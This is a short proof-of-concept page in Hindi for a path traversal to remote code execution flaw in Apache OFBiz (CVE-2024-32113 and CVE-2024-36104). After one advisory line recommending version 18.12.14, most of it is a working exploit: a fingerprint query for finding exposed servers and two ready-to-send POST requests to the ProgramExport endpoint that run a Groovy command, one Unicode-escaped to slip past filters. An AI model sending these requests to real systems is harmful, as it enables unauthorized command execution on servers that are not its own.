
# Apache OFBIZ पाथ ट्रैवर्सल जिससे RCE POC होता है [CVE-2024-32113 और CVE-2024-36104]
Apache OFBIZ में पथ भ्रमण जो RCE EXP की ओर ले जाता है।
Apache OFBiz में प्रतिबंधित निर्देशिका में पथनाम की अनुचित सीमा ('Path Traversal') कमजोरी। यह समस्या Apache OFBiz के संस्करण 18.12.14 से पहले (शामिल नहीं) को प्रभावित करती है। उपयोगकर्ताओं को संस्करण 18.12.14 में अपग्रेड करने की सलाह दी जाती है, जो इस समस्या को ठीक करता है।
app="Apache_OFBiz"
POST /webtools/control/forgotPassword;/ProgramExport HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 127.0.0.1:8443
groovyProgram=throw+new+Exception('id'.execute().text);
यूनिकोड के साथ
idनिष्पादित करें।
POST /webtools/control/forgotPassword;/ProgramExport HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 127.0.0.1:8443
groovyProgram=\u0074\u0068\u0072\u006f\u0077\u0020\u006e\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0028\u0027\u0069\u0064\u0027\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002e\u0074\u0065\u0078\u0074\u0029\u003b
